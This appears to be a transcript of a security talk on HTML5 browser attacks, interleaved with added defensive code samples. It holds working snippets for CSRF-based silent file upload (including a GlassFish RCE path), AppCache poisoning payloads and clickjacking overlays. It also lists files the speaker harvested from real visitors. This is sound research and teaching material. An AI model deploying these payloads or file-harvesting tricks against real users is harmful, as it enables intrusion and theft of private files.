Something wicked this way comes - CONFidence
krzysztof-kotowicz
Transcript of Something wicked this way comes - CONFidence
Plan
• HTML5 trickery
• Filejacking
• AppCache poisoning
• Silent file upload
• IFRAME sandbox anti-framebuster
• Don’t get framed!
• Drag into
• Drag out content extraction
• Frame based login detection
• Wrap-up
HTML5 trickery
Filejacking
• HTML5 directory upload (Chrome only)
• displays this ====> (folder picker dialog shown on the slide)
• JS gets read access to all files within the chosen folder
<input type=file directory>
Filejacking
Business plan
• set up tempting webpage
• overlay input (CSS) with
• wait for clueless users
• get files & upload them to your server
Filejacking
• How clueless are users actually?
• http://kotowicz.net/wu running for ~13 months
• very limited exposure
• only websec oriented visitors
• 298 clients connected (217 IPs)
• tons of interesting files
Filejacking
LOTS of these ------>
• Downloads/# BeNaughtyLive.com/
• Downloads/# GoLiveTrannies.com/
• BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb
• bitches/1300563524557.jpg
Filejacking
• websec staff!
• but surely no private data?
Filejacking
• Wireless Assess points.txt
• interesting network next to me.txt
• onlinePasswords.txt
• s/pw.txt
• letter of authorization.pdf
• Staff-<name,surname>.pdf
• <name,surname> - resume.doc
• PIT-37, <name,surname>.PITY2010NG
• Deklaracja_VAT7_Luty_2011.pdf
• Pricing-Recommendation_CR.xlsm.zip
• but surely no clients’ data?
Filejacking
• sony reports/0045_sonymusic.##.zip
• SecurityQA.SQL.Injection.Results.v1.1.docx
• SSOCrawlTest5.4.097.xml
• IPS CDE Wireless Audit-January 2011-1 0.docx
• IPS Wireless Testing Schedule April 2011.xls
• 01-####### Corporation (Security Unarmed Guard).xls
• Faktura_numer_26_2011_<company>.pdf
• websec cred~
• security_users.sql.zip
• !important - questions for web developers.docx
• sslstrip.log~
• ##### Paros Log.txt
So much for the NDAs...
Filejacking
+ All your file are belong to me
+ Trivial to set up
+ Filter files by e.g. extension, size etc.
- Chrome only
- Requires users prone to social-engineering
AppCache poisoning
HTML5 Offline Web Applications
<html manifest=cache.manifest>
• cache.manifest lists URLs to cache
• cache expires only when manifest is changed

```
CACHE MANIFEST
index.html
stylesheet.css
images/logo.png
scripts/main.js
```
AppCache poisoning
• abuse to persist man-in-the-middle
• manifest must be MIME text/cache-manifest
• Chrome fills AppCache without user confirmation
• two steps
• poison AppCache while m-i-t-m
• have payloads stay forever in cache
AppCache poisoning
• tamper http://victim/

```html
<html manifest=/robots.txt>
<script>evil()</script>
```

• tamper http://victim/robots.txt

```
CACHE MANIFEST
CACHE:
http://victim/
NETWORK:
*
```
AppCache poisoning
Later on, after m-i-t-m:
1. http://victim/ fetched from AppCache
2. browser checks for new manifest: GET /robots.txt
3. receives text/plain robots.txt & ignores it
4. tainted AppCache is still used
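The persistence in steps 2-4 follows from how the browser treats a failed manifest re-fetch. The model below is an added example, not code from the talk: it applies the Offline Web Applications update rules the slide walks through (wrong MIME type counts as a fetch failure and the cache is kept; only a 404 or 410 makes the cache obsolete) to the talk's robots.txt manifest. parseManifest, manifestRefetch and the sample manifests are this example's own.

```javascript
// Added example, not from the talk: a model of the browser's decision when it
// re-fetches an AppCache manifest, following the Offline Web Applications
// update algorithm as the slide describes it.
const MANIFEST_MIME = "text/cache-manifest";

function parseManifest(text) {
  // Return the URLs in the CACHE section (the section that starts right after the header).
  const lines = text.split(/\r?\n/).map(l => l.trim());
  if (lines[0] !== "CACHE MANIFEST") throw new Error("not a cache manifest");
  let section = "CACHE";
  const urls = [];
  for (const line of lines.slice(1)) {
    if (!line || line.startsWith("#")) continue;     // blank lines and comments
    if (/^[A-Z]+:$/.test(line)) { section = line.slice(0, -1); continue; }
    if (section === "CACHE") urls.push(line);        // NETWORK and FALLBACK entries are not cached
  }
  return urls;
}

function manifestRefetch(state, status, contentType, body) {
  // state: {manifest, cached} for an existing cache, or null before any cache exists.
  if (status === 404 || status === 410) {
    return { outcome: "obsolete", state: null };     // the only responses that delete the cache
  }
  const mime = contentType.split(";")[0].trim().toLowerCase();
  if (status !== 200 || mime !== MANIFEST_MIME) {
    return { outcome: "retained", state };           // fetch failure (step 3 on the slide): old cache stays
  }
  if (state && body === state.manifest) {
    return { outcome: "unchanged", state };          // byte-identical manifest: nothing to do
  }
  return { outcome: "updated", state: { manifest: body, cached: parseManifest(body) } };
}

// Constructed sample: the talk's poisoned robots.txt served as a manifest during the m-i-t-m,
// and the genuine text/plain robots.txt the real server returns afterwards.
const POISONED_MANIFEST = "CACHE MANIFEST\nCACHE:\nhttp://victim/\nNETWORK:\n*\n";
const REAL_ROBOTS = "User-agent: *\nDisallow: /admin\n";

function poisoningTimeline() {
  const during = manifestRefetch(null, 200, "text/cache-manifest", POISONED_MANIFEST);
  const after = manifestRefetch(during.state, 200, "text/plain", REAL_ROBOTS);
  return [during.outcome, after.outcome];            // ["updated", "retained"]
}
```

The only manifest response that clears the poisoned entry is a 404 or 410 for the manifest URL, which a live robots.txt never returns; serving the site over HTTPS with HSTS removes the m-i-t-m step that plants it.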
AppCache poisoning
+ Poison any URL
+ Payload stays until manually removed
- Chrome or Firefox with user interaction
- Needs active man-in-the-middle
https://github.com/koto/sslstrip
Silent file upload
• File upload purely in Javascript
• Emulates <input type=file> with:
• any file name
• any file content
• File constructed in Javascript (it’s not a real file!)
• Uses Cross Origin Resource Sharing
Silent file upload
• Cross Origin Resource Sharing = cross domain AJAX
http://attacker.com/

```javascript
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://victim", true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.withCredentials = true; // send cookies
xhr.send("Anything I want");
```
Silent file upload
• raw multipart/form-data request

```javascript
function fileUpload(url, fileData, fileName) {
  var boundary = "xxxxxxxxx",
      xhr = new XMLHttpRequest();
  xhr.open("POST", url, true);
  xhr.withCredentials = true; // send the victim's cookies
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  // the multipart body is assembled by hand, so the "file" never has to exist on disk
  var b = "--" + boundary + "\r\n" +
      'Content-Disposition: form-data; name="contents"; filename="' + fileName + '"\r\n' +
      "Content-Type: application/octet-stream\r\n" +
      "\r\n" +
      fileData + "\r\n" +
      "--" + boundary + "--";
  xhr.setRequestHeader("Content-Length", b.length); // browsers ignore this and compute it themselves
  xhr.send(b);
}
```
Silent file upload
+ No user interaction
+ Works in most browsers
+ You can add more form fields
- CSRF flaw needed
- No access to response
Silent file upload
DEMO
Flickr.com
Silent file upload
• GlassFish Enterprise Server 3.1
• CVE-2012-0550 by Roberto Suggi Liverani
• //goo.gl/cOu1F

```javascript
logUrl = 'http://glassfishserver/management/domain/applications/application';
fileUpload(c, "maliciousarchive.war");
```

• logged admin + CSRF = RCE
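The silent upload only works where the server accepts a cookie-authenticated multipart POST with nothing tying it to the page that sent it (the "CSRF flaw needed" on the previous slide). The check below is an added example, not the talk's or any product's code: it parses the raw body that fileUpload builds and rejects it unless the Origin header matches the site and a per-session token is present as a form field. The names parseMultipart, uploadAllowed and csrf_token are assumptions.

```javascript
// Added example, not from the talk. Server-side gate for the cross-origin
// multipart upload that fileUpload() builds: the browser attaches the victim's
// cookies and sends no preflight, so the session cookie alone proves nothing.
function parseMultipart(body, boundary) {
  // Parse a raw multipart/form-data body into {fieldName: {filename, data}}.
  const parts = {};
  for (const chunk of body.split("--" + boundary).slice(1)) {
    if (chunk.startsWith("--")) break;               // closing delimiter reached
    const sep = chunk.indexOf("\r\n\r\n");
    if (sep < 0) continue;
    const head = chunk.slice(0, sep);
    let data = chunk.slice(sep + 4);
    if (data.endsWith("\r\n")) data = data.slice(0, -2);
    const name = /name="([^"]*)"/.exec(head);
    if (!name) continue;
    const fn = /filename="([^"]*)"/.exec(head);
    parts[name[1]] = { filename: fn ? fn[1] : null, data };
  }
  return parts;
}

function uploadAllowed(headers, body, siteOrigin, sessionToken) {
  // headers: lower-cased header names -> values. Returns {ok, reason, filename?}.
  const ctype = headers["content-type"] || "";
  const m = /boundary=([^;,\s]+)/.exec(ctype);
  if (!ctype.startsWith("multipart/form-data") || !m) return { ok: false, reason: "not multipart" };
  // Browsers add Origin to every cross-site XHR POST and a page cannot overwrite it.
  if (headers["origin"] !== undefined && headers["origin"] !== siteOrigin) {
    return { ok: false, reason: "cross-origin request" };
  }
  const fields = parseMultipart(body, m[1]);
  // The token lives in the victim's own page; a cross-origin page cannot read it ("No access to response").
  if (!fields.csrf_token || fields.csrf_token.data !== sessionToken) {
    return { ok: false, reason: "missing or wrong CSRF token" };
  }
  if (!fields.contents) return { ok: false, reason: "no file part" };
  return { ok: true, reason: "ok", filename: fields.contents.filename };
}

// Constructed sample: the body fileUpload(url, "PK...", "evil.war") from the talk would send.
function attackerBody(boundary) {
  return "--" + boundary + "\r\n" +
    'Content-Disposition: form-data; name="contents"; filename="evil.war"\r\n' +
    "Content-Type: application/octet-stream\r\n\r\n" +
    "PK\u0003\u0004 fake archive bytes\r\n" +
    "--" + boundary + "--";
}
```

The Origin check catches the talk's request on its own; the token is what protects older clients that omit Origin and forms that are posted without XHR.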
IFRAME sandbox anti-framebuster
• Used to embed untrusted content
sandbox="allow-same-origin allow-scripts allow-forms allow-top-navigation"
• prevents JS execution in frame
• prevents defacement
• Facilitates clickjacking!
Clickjacking?
IFRAME sandbox anti-framebuster
http://attacker.com

```html
<iframe sandbox="allow-forms allow-scripts" src="//victim"></iframe>
```

http://victim

```javascript
top.location = self.location; // doesn’t work :(
```
IFRAME sandbox anti-framebuster
+ Chrome / Safari / IE 10
+ Will disable most JS framebusters
- X-Frame-Options
Don’t get framed!
Same origin policy
• makes web (relatively) safe
• restricts cross-origin communication
• can be relaxed though
• crossdomain.xml
• document.domain
• HTML5 Cross Origin Resource Sharing
• or ignored...
• UI redressing
UI Redressing?
Jedi mind tricks on victim users
UI Redressing
• This is not the page you’re looking at
• This is not the thing you’re clicking
• This is not the thing you’re dragging
• This is not the thing you’re typing
• This is not the thing you’re copying
• Victims attack the applications for us
Drag into
• Put attacker’s content into victim form
Drag into
DEMO
Alphabet Hero
Drag into
+ Inject arbitrary content
+ Trigger self-XSS
- Firefox only (will die soon!)
- X-Frame-Options
Drag out content extraction
[Diagrams on three slides: an image the user drags; the image overlaid on the victim <iframe>; a <textarea> drop target placed over the victim <iframe>]
Drag out content extraction

```html
<div id=game style="position:relative">
  <img style="position:absolute;..." src="paper.png" />
  <img style="position:absolute;..." src="trash.png" />
  <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."></iframe>
  <textarea style="position:absolute; opacity:0;..." id=dropper></textarea>
</div>
```
Drag out content extraction
+ Access sensitive content cross domain
- Firefox only (will die soon!)
- X-Frame-Options
Frame-based login detection
• Are you now logged in to these websites?
• facebook.com
• amazon.com
• a-banking-site.secure
• Why should I care?
• e.g. launch CSRF / other attacks
Frame-based login detection
• Previous work:
• Cache timing, lcamtuf
• Abusing HTTP Status Code, Mike Cardwell
• Anchor Element Position Detection, Paul Stone
<iframe src=//victim/#logout />
Frame-based login detection
http://attacker.com

```html
<iframe src="//victim/login">
```

//victim/login

```html
<input id=login><script>document.getElementById('login').focus()</script>
```
Frame-based login detection
DEMO
Summary
• HTML5 is attacker’s friend too!
• Don’t get framed
• Users based pwnage FTW
Developers:
Use X-Frame-Options: DENY
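The sandbox anti-framebuster, drag-into, drag-out and login-detection tricks all list the same limitation on their slides: X-Frame-Options, the header the summary tells developers to send. The helper below is an added example, not the talk's code: it reads a response's headers and reports whether the browser itself will refuse to frame the page, giving a CSP frame-ancestors directive precedence over X-Frame-Options as browsers do. framingPolicy and the header-object shape it takes are this example's own.

```javascript
// Added example, not from the talk. headers: object mapping lower-case header
// names to arrays of values, as a server log or a fetch wrapper would give them.
// A JS framebuster does not count here: the sandbox attribute can switch scripts off,
// so only a header the browser enforces stops the framing the talk's tricks rely on.
function framingPolicy(headers) {
  // CSP frame-ancestors, when present, takes precedence over X-Frame-Options.
  const fa = (headers["content-security-policy"] || [])
    .flatMap(v => v.split(";"))
    .map(d => d.trim().split(/\s+/))
    .find(d => d[0] === "frame-ancestors");
  if (fa) {
    const sources = fa.slice(1).filter(s => s.length > 0);
    if (sources.length === 0 || (sources.length === 1 && sources[0] === "'none'")) return "denied";
    if (sources.length === 1 && sources[0] === "'self'") return "same-origin";
    if (sources.includes("*")) return "unprotected";
    return "allow-listed: " + sources.join(" ");
  }
  // X-Frame-Options: split combined values, compare case-insensitively.
  const xfo = (headers["x-frame-options"] || [])
    .flatMap(v => v.split(","))
    .map(v => v.trim().toUpperCase())
    .filter(v => v.length > 0);
  if (xfo.length === 0) return "unprotected";        // nothing stops framing: what the talk's tricks need
  if (new Set(xfo).size > 1) return "conflicting";   // e.g. "DENY, SAMEORIGIN": a misconfiguration to fix
  if (xfo[0] === "DENY") return "denied";            // the summary's recommendation
  if (xfo[0] === "SAMEORIGIN") return "same-origin";
  return "invalid";                                  // e.g. ALLOWALL or ALLOW-FROM: ignored by current browsers, so frameable
}
```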
Wake up, I’m done!
• html5sec.org
• code.google.com/p/html5security
• www.contextis.co.uk/research/white-papers/clickjacking
• blog.kotowicz.net
• github.com/koto
Twitter: @kkotowicz
Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, ....